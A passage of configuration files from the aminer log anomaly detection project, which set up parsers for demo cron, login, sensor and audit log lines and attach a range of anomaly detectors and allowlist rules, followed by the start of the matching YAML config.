    # NewMatchIdValueComboDetector below uses to join PATH and SYSCALL records.
    # The SYSCALL branch parses up to ``exit=`` and lets AnyByte swallow the rest.
    service_children_audit = [
        SequenceModelElement('path', [
            FixedDataModelElement('type', b'type=PATH '),
            FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'),
            FixedDataModelElement('placeholder', b':'),
            DecimalIntegerValueModelElement('id'),
            FixedDataModelElement('item_string', b'): item='),
            DecimalIntegerValueModelElement('item'),
            FixedDataModelElement('name_string', b' name="'),
            DelimitedDataModelElement('name', b'"'),
            FixedDataModelElement('inode_string', b'" inode='),
            DecimalIntegerValueModelElement('inode'),
            FixedDataModelElement('dev_string', b' dev='),
            DelimitedDataModelElement('dev', b' '),
            FixedDataModelElement('mode_string', b' mode='),
            # mode is zero-padded in audit output (e.g. 0100644), hence PAD_TYPE_ZERO.
            DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO),
            FixedDataModelElement('ouid_string', b' ouid='),
            DecimalIntegerValueModelElement('ouid'),
            FixedDataModelElement('ogid_string', b' ogid='),
            DecimalIntegerValueModelElement('ogid'),
            FixedDataModelElement('rdev_string', b' rdev='),
            DelimitedDataModelElement('rdev', b' '),
            FixedDataModelElement('nametype_string', b' nametype='),
            FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]),
        SequenceModelElement('syscall', [
            FixedDataModelElement('type', b'type=SYSCALL '),
            FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'),
            FixedDataModelElement('placeholder', b':'),
            DecimalIntegerValueModelElement('id'),
            FixedDataModelElement('arch_string', b'): arch='),
            DelimitedDataModelElement('arch', b' '),
            FixedDataModelElement('syscall_string', b' syscall='),
            DecimalIntegerValueModelElement('syscall'),
            FixedDataModelElement('success_string', b' success='),
            FixedWordlistDataModelElement('success', [b'yes', b'no']),
            FixedDataModelElement('exit_string', b' exit='),
            DecimalIntegerValueModelElement('exit'),
            AnyByteDataModelElement('remainding_data')])]

    # Lines that exercise one parser element each; appended to ``/model/ParsingME`` as a FirstMatch list,
    # so the order of the ``append`` calls below is the match order.
    service_children_parsing_model_element = [
        DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'),
        DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'),
        DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'),
        SequenceModelElement('se', [
            DelimitedDataModelElement('DelimitedDataModelElement', b';'),
            FixedDataModelElement('FixedDataModelElement', b';')])]

    # ElementValueBranchModelElement: branch on the index of the matched "wordlist" entry
    # (0 -> "data: " followed by an integer, 1 -> "string: " followed by "fixed String").
    fixed_data_me1 = FixedDataModelElement("fixed1", b'match ')
    fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String')
    fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: '])
    decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal")
    service_children_parsing_model_element.append(
        ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [
            SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]),
            SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]),
            "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2}))

    service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement'))

    # "Gateway IP-Address: <ip>" -- this is the path the RFC1918 / value-range rules below inspect.
    service_children_parsing_model_element.append(SequenceModelElement('se2', [
        FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '),
        IpAddressDataModelElement('IpAddressDataModelElement')]))

    # Use the process locale for month-name parsing, falling back to en_US.utf8 when none is set.
    # NOTE(review): only the fully unset case (None, None) is handled; a partially set locale
    # (one element None) would be formatted as e.g. "en_US.None" -- TODO confirm this cannot occur.
    import locale
    loc = locale.getlocale()
    if loc == (None, None):
        loc = ('en_US', 'utf8')
    service_children_parsing_model_element.append(
        MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)]))

    service_children_parsing_model_element.append(
        RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [
            FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '),
            DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1))

    service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#'))

    service_children_parsing_model_element.append(
        SequenceModelElement('se', [
            WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'),
            FixedDataModelElement('fixed', b' ')]))

    # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches.
    service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement'))

    # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets to the
    # AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted.
    service_children_parsing_model_element.append(OptionalMatchModelElement(
        '/', FirstMatchModelElement('FirstMatchModelElement//optional', [
            FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'),
            SequenceModelElement('se', [
                FixedDataModelElement('FixedDME', b'Any:'),
                AnyByteDataModelElement('AnyByteDataModelElement')])])))

    # Single-character lines "g".."l" used to feed the event-correlation demo (paths /model/ECD/g ... /model/ECD/l).
    # The enumerate() index is unused; iterating the bytes object directly would be equivalent.
    alphabet = b'ghijkl'
    service_children_ecd = []
    for _, char in enumerate(alphabet):
        char = bytes([char])
        service_children_ecd.append(FixedDataModelElement(char.decode(), char))

    # Top-level model: presumably the first child that matches a line wins, so more specific
    # line shapes are listed before the catch-all ``ParsingME`` branch.
    parsing_model = FirstMatchModelElement('model', [
        SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement),
        SequenceModelElement('CronExecution', service_children_cron_job_execution),
        SequenceModelElement('DailyCron', service_children_cron_job),
        SequenceModelElement('DiskReport', service_children_disk_report),
        SequenceModelElement('LoginDetails', service_children_login_details),
        DecimalIntegerValueModelElement('Random'),
        SequenceModelElement('RandomTime', service_children_random_time),
        SequenceModelElement('Sensors', service_children_sensors),
        SequenceModelElement('IPAddresses', service_children_user_ip_address),
        FirstMatchModelElement('type', service_children_audit),
        FirstMatchModelElement('ECD', service_children_ecd),
        FirstMatchModelElement('ParsingME', service_children_parsing_model_element)])

    # Some generic imports.
    from aminer.analysis import AtomFilters

    # Create all global handler lists here and append the real handlers later on.
    # Use this filter to distribute all atoms to the analysis handlers.
    # Every detector below is attached with ``atom_filter.add_handler``; the attach order is
    # presumably the order in which each atom is offered to the handlers.
    atom_filter = AtomFilters.SubhandlerFilter(None)

    # Timestamp correction sits in front of the filter so all detectors see adjusted times.
    from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust
    simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter])
    analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust")

    # The only event sink in this demo: anomalies are printed to a stream rather than mailed.
    from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
    stream_printer_event_handler = StreamPrinterEventHandler(analysis_context)
    anomaly_event_handlers = [stream_printer_event_handler]

    # Now define the AtomizerFactory using the model. A simple line
    # based one is usually sufficient.
    from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory
    analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(
        parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, default_timestamp_path_list=["/model/DailyCron/DTM"])

    # Just report all unparsed atoms to the event handlers.
    # The simple handler does not stop propagation, so the verbose handler also sees every
    # unparsed atom and reports it with parser details; the verbose one stops propagation.
    from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler
    simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers)
    atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False)
    analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler")

    verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model)
    atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True)
    analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler")

    from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector
    timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers)
    atom_filter.add_handler(timestamps_unsorted_detector)
    analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector")

    from aminer.analysis import Rules
    from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector

    # This rule list should trigger, when the line does not look like: User root (logged in, logged out)
    # or User 'username' (logged in, logged out) x minutes ago.
    # Read as: a LoginDetails line is allowed when (a) it carries a "minutes ago" part and the
    # user is not root, or (b) it carries no "minutes ago" part at all; any non-LoginDetails
    # line is allowed. Everything else (e.g. "User root logged in 5 minutes ago.") is a violation.
    allowlist_rules = [
        Rules.OrMatchRule([
            Rules.AndMatchRule([
                Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'),
                Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')),
                Rules.DebugMatchRule(debug_match_result=True)]),
            Rules.AndMatchRule([
                Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),
                Rules.PathExistsMatchRule('/model/LoginDetails'),
                Rules.DebugMatchRule(debug_match_result=True)]),
            Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])]

    allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist")
    atom_filter.add_handler(allowlist_violation_detector)

    from aminer.analysis.ParserCount import ParserCount
    parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10)
    analysis_context.register_component(parser_count, component_name="ParserCount")
    atom_filter.add_handler(parser_count)

    # The EventTypeDetector is shared by the two variable-level detectors that follow.
    from aminer.analysis.EventTypeDetector import EventTypeDetector
    etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers)
    analysis_context.register_component(etd, component_name="EventTypeDetector")
    atom_filter.add_handler(etd)

    from aminer.analysis.VariableTypeDetector import VariableTypeDetector
    vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False, output_logline=False, ignore_list=["/model/RandomTime"])
    analysis_context.register_component(vtd, component_name="VariableTypeDetector")
    atom_filter.add_handler(vtd)

    # NOTE(review): the local name ``vtd`` is reused here for the VariableCorrelationDetector.
    # Harmless, because the VariableTypeDetector instance has already been registered and attached,
    # but a distinct name (e.g. ``vcd``) would avoid confusion when reading the two sections.
    from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector
    vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5, ignore_list=["/model/RandomTime"])
    analysis_context.register_component(vtd, component_name="VariableCorrelationDetector")
    atom_filter.add_handler(vtd)

    from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector
    ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0, learn_mode=True)
    analysis_context.register_component(ecd, component_name="EventCorrelationDetector")
    atom_filter.add_handler(ecd)

    from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector
    efd = EventFrequencyDetector(analysis_context.aminer_config, anomaly_event_handlers, window_size=0.5)
    analysis_context.register_component(efd, component_name="EventFrequencyDetector")
    atom_filter.add_handler(efd)

    # Sequence detection is restricted to the ParsingME branch; the ECD letters, random values and
    # the daily cron line are excluded so they do not pollute the learned sequences.
    from aminer.analysis.EventSequenceDetector import EventSequenceDetector
    esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[
        '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime', '/model/DailyCron'])
    analysis_context.register_component(esd, component_name="EventSequenceDetector")
    atom_filter.add_handler(esd)

    # Report bare integer lines whose value is exactly 1, 10 or 100.
    from aminer.analysis.MatchFilter import MatchFilter
    match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[1, 10, 100], output_logline=True)
    analysis_context.register_component(match_filter, component_name="MatchFilter")
    atom_filter.add_handler(match_filter)

    from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
    new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True, output_logline=True)
    analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath")
    atom_filter.add_handler(new_match_path_detector)

    def tuple_transformation_function(match_value_list):
        """
        Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.

        Looks up the already-known record for this value tuple and flips the detector's
        ``learn_mode`` off only when the stored counter (``extra_data[2]``, presumably an
        occurrence count -- TODO confirm) is about to reach a multiple of 10, so that every
        10th occurrence is reported instead of silently learned. The tuple itself is returned
        unchanged.

        NOTE(review): this closure references ``enhanced_new_match_path_value_combo_detector``,
        which is only assigned below; that is fine as long as the detector never calls the
        transformation before its constructor has returned.

        :param match_value_list: the list of matched values for the detector's target paths.
        :return: ``match_value_list`` unchanged.
        """
        extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list))
        if extra_data is not None:
            mod = 10
            if (extra_data[2] + 1) % mod == 0:
                enhanced_new_match_path_value_combo_detector.learn_mode = False
            else:
                enhanced_new_match_path_value_combo_detector.learn_mode = True
        return match_value_list

    from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector
    enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [
        '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True,
        tuple_transformation_function=tuple_transformation_function, output_logline=True)
    analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo")
    atom_filter.add_handler(enhanced_new_match_path_value_combo_detector)

    # Second allowlist, combining time-of-day rules for the ECD letters with IP address policy.
    import re
    # Fires an extra event whenever the gateway IP is an RFC1918 (private) address.
    ip_match_action = Rules.EventGenerationMatchAction("Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers)
    vdmt = Rules.ValueDependentModuloTimeMatchRule(None, 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3])
    mt = Rules.ModuloTimeMatchRule(None, 3, 0, 3, None)
    time_allowlist_rules = [
        Rules.AndMatchRule([
            Rules.ParallelMatchRule([
                Rules.ValueDependentDelegatedMatchRule([
                    '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], {
                    (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt, None: mt}, mt),
                Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action),
                Rules.DebugHistoryMatchRule(debug_match_result=True)
            ]),
            # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed
            # (134744072 == 8.8.8.8, 134743044 == 8.8.4.4, 167772160..184549375 == 10.0.0.0..10.255.255.255
            # as 32-bit integers). The last rule makes any audit SYSCALL record with ``success=no``
            # an allowlist violation, i.e. failed syscalls are always reported.
            Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])),
            Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)),
            Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$")))
        ])
    ]
    time_allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist")
    atom_filter.add_handler(time_allowlist_violation_detector)

    from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \
        PathDependentHistogramAnalysis
    # Hour-of-day bins (86400 s modulo, 3600 s per bin, 24 bins) and a linear 50..150 scale in steps of 5.
    modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True)
    linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True)
    histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [
        ('/model/RandomTime/Random', modulo_time_bin_definition),
        ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis")
    atom_filter.add_handler(histogram_analysis)

    path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis")
    atom_filter.add_handler(path_dependent_histogram_analysis)

    from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector
    match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10, output_logline=True)
    analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange")
    atom_filter.add_handler(match_value_average_change_detector)

    # Writes the three sensor values of every Sensors line to stdout, ';'-separated, with no
    # leading prefix. This is output for the demo, not an anomaly report.
    import sys
    from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter
    match_value_stream_writer = MatchValueStreamWriter(sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'')
    analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter")
    atom_filter.add_handler(match_value_stream_writer)

    # New (username, IP) pairs on "changed IP address" lines.
    from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector
    new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, output_logline=True, learn_mode=True)
    analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo")
    atom_filter.add_handler(new_match_path_value_combo_detector)

    # Joins audit PATH and SYSCALL records by their audit id and reports new (file name, syscall number)
    # combinations; records arriving more than 5 s apart are presumably not joined -- TODO confirm unit.
    from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector
    new_match_id_value_combo_detector = NewMatchIdValueComboDetector(analysis_context.aminer_config, ['/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True)
    analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector")
    atom_filter.add_handler(new_match_id_value_combo_detector)

    from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector
    new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, ['/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True)
    analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue")
    atom_filter.add_handler(new_match_path_value_detector)

    # Alerts when the disk report stops arriving.
    from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector
    missing_match_path_value_detector = MissingMatchPathValueDetector(analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5, output_logline=True)
    analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch")
    atom_filter.add_handler(missing_match_path_value_detector)

    from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector
    time_correlation_detector = TimeCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=10000, output_logline=True)
    analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector")
    atom_filter.add_handler(time_correlation_detector)

    # Every cron announcement must be followed by an execution with the same JobNumber.
    # NOTE(review): the rule window is (5, 6) while the announced text says "in 5 min"; whether
    # these arguments are seconds or minutes is not visible here -- TODO confirm the units.
    from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector
    cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')])
    a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None)
    b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement])
    rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)]

    time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers, output_logline=True)
    analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector")
    atom_filter.add_handler(time_correlation_violation_detector)
logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminer/demo-config.yml000066400000000000000000000704241437606560100261250ustar00rootroot00000000000000LearnMode: False Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: space type: FixedDataModelElement name: 'Space' args: ' Current Disk Data is: Filesystem Type Size Used Avail Use%' - id: data type: DelimitedDataModelElement name: 'Data' delimiter: '%''/' - id: rest type: AnyByteDataModelElement name: 'Rest' - id: userLoginDetails type: FixedDataModelElement name: 'User' args: 'User ' - id: userIpAddress type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' delimiter: ' ' - id: status type: FixedWordlistDataModelElement name: 'Status' args: - ' logged in' - ' logged out' - id: blank type: FixedDataModelElement name: 'Blank' args: ' ' - id: minutes type: DecimalIntegerValueModelElement name: 'Minutes' - id: ago type: FixedDataModelElement name: 'Ago' args: ' minutes ago.' 
- id: time type: SequenceModelElement name: 'Time' args: - blank - minutes - ago - id: pastTime type: OptionalMatchModelElement name: 'PastTime' args: time - id: dtm type: DateTimeModelElement name: 'DTM' date_format: '%Y-%m-%d %H:%M:%S' start_year: null text_locale: null max_time_jump_seconds: 86400 - id: uNameSpace1 type: FixedDataModelElement name: 'UNameSpace1' args: ' ' - id: uName type: DelimitedDataModelElement name: 'UName' delimiter: ' ' - id: uNameSpace2 type: FixedDataModelElement name: 'UNameSpace2' args: ' ' - id: delimitedUser type: DelimitedDataModelElement name: 'User' delimiter: ' ' - id: cron type: FixedDataModelElement name: 'Cron' args: ' cron[' - id: jobNumber type: DecimalIntegerValueModelElement name: 'JobNumber' - id: details type: FixedDataModelElement name: 'Details' args: ']: Job `cron.daily` started.' - id: spaceRandom type: FixedDataModelElement name: 'Space' args: 'Random: ' - id: random type: DecimalIntegerValueModelElement name: 'Random' - id: fixedTemp type: FixedDataModelElement name: 'FixedTemp' args: 'CPU Temp: ' - id: temp type: DecimalIntegerValueModelElement name: 'Temp' - id: degrees type: FixedDataModelElement name: 'Degrees' args: '°C' - id: cpuTemp type: SequenceModelElement name: 'CPUTemp' args: - fixedTemp - temp - degrees - id: space1 type: FixedDataModelElement name: 'Space1' args: ', ' - id: fixedWorkload type: FixedDataModelElement name: 'FixedWorkload' args: 'CPU Workload: ' - id: workload type: DecimalIntegerValueModelElement name: 'Workload' - id: percent type: FixedDataModelElement name: 'Percent' args: '%' - id: cpuWorkload type: SequenceModelElement name: 'CPUWorkload' args: - fixedWorkload - workload - percent - id: space2 type: FixedDataModelElement name: 'Space2' args: ', ' - id: action type: FixedDataModelElement name: 'Action' args: ' changed IP address to ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: fixedSpace type: FixedDataModelElement name: 'Space' args: ' ' - id: run type: 
FixedDataModelElement name: 'Run' args: ']: Will run job `' - id: cronType type: FixedWordlistDataModelElement name: 'CronType' args: - 'cron.daily' - 'cron.hourly' - 'cron.monthly' - 'cron.weekly' - id: startTime type: FixedDataModelElement name: 'StartTime' args: "' in 5 min." - id: emptySpace1 type: FixedDataModelElement name: 'Space1' args: ' ' - id: job type: FixedDataModelElement name: 'Job' args: ']: Job `' - id: started type: FixedDataModelElement name: 'Started' args: "' started" - id: typePath type: FixedDataModelElement name: 'type' args: 'type=PATH ' - id: msgAudit type: FixedDataModelElement name: 'msg_audit' args: 'msg=audit(' - id: msg type: DelimitedDataModelElement name: 'msg' delimiter: ':' - id: placeholder type: FixedDataModelElement name: 'placeholder' args: ':' - id: id type: DecimalIntegerValueModelElement name: 'id' - id: item_string type: FixedDataModelElement name: 'item_string' args: '): item=' - id: item type: DecimalIntegerValueModelElement name: 'item' - id: name_string type: FixedDataModelElement name: 'name_string' args: ' name="' - id: name type: DelimitedDataModelElement name: 'name' delimiter: '"' - id: inode_string type: FixedDataModelElement name: 'inode_string' args: '" inode=' - id: inode type: DecimalIntegerValueModelElement name: 'inode' - id: dev_string type: FixedDataModelElement name: 'dev_string' args: ' dev=' - id: dev type: DelimitedDataModelElement name: 'dev' delimiter: ' ' - id: mode_string type: FixedDataModelElement name: 'mode_string' args: ' mode=' - id: mode type: DecimalIntegerValueModelElement name: 'mode' value_pad_type: "zero" - id: ouid_string type: FixedDataModelElement name: 'ouid_string' args: ' ouid=' - id: ouid type: DecimalIntegerValueModelElement name: 'ouid' - id: ogid_string type: FixedDataModelElement name: 'ogid_string' args: ' ogid=' - id: ogid type: DecimalIntegerValueModelElement name: 'ogid' - id: rdev_string type: FixedDataModelElement name: 'rdev_string' args: ' rdev=' - id: rdev type: 
DelimitedDataModelElement name: 'rdev' delimiter: ' ' - id: nametype_string type: FixedDataModelElement name: 'nametype_string' args: ' nametype=' - id: nametype type: FixedWordlistDataModelElement name: 'nametype' args: - 'NORMAL' - 'ERROR' - id: path type: SequenceModelElement name: 'path' args: - typePath - msgAudit - msg - placeholder - id - item_string - item - name_string - name - inode_string - inode - dev_string - dev - mode_string - mode - ouid_string - ouid - ogid_string - ogid - rdev_string - rdev - nametype_string - nametype - id: typeSyscall type: FixedDataModelElement name: 'type' args: 'type=SYSCALL ' - id: arch_string type: FixedDataModelElement name: 'arch_string' args: '): arch=' - id: arch type: DelimitedDataModelElement name: 'arch' delimiter: ' ' - id: syscall_string type: FixedDataModelElement name: 'syscall_string' args: ' syscall=' - id: syscall1 type: DecimalIntegerValueModelElement name: 'syscall' - id: success_string type: FixedDataModelElement name: 'success_string' args: ' success=' - id: success type: FixedWordlistDataModelElement name: 'success' args: - 'yes' - 'no' - id: exit_string type: FixedDataModelElement name: 'exit_string' args: ' exit=' - id: exit type: DecimalIntegerValueModelElement name: 'exit' - id: remainding_data type: AnyByteDataModelElement name: 'remainding_data' - id: syscall type: SequenceModelElement name: 'syscall' args: - typeSyscall - msgAudit - msg - placeholder - id - arch_string - arch - syscall_string - syscall1 - success_string - success - exit_string - exit - remainding_data - id: dateTimeModelElement type: DateTimeModelElement name: 'DateTimeModelElement' date_format: 'Current DateTime: %d.%m.%Y %H:%M:%S' - id: decimalFloatValueModelElement type: DecimalFloatValueModelElement name: 'DecimalFloatValueModelElement' value_sign_type: 'optional' - id: decimalIntegerValueModelElement type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' value_sign_type: 'optional' value_pad_type: 
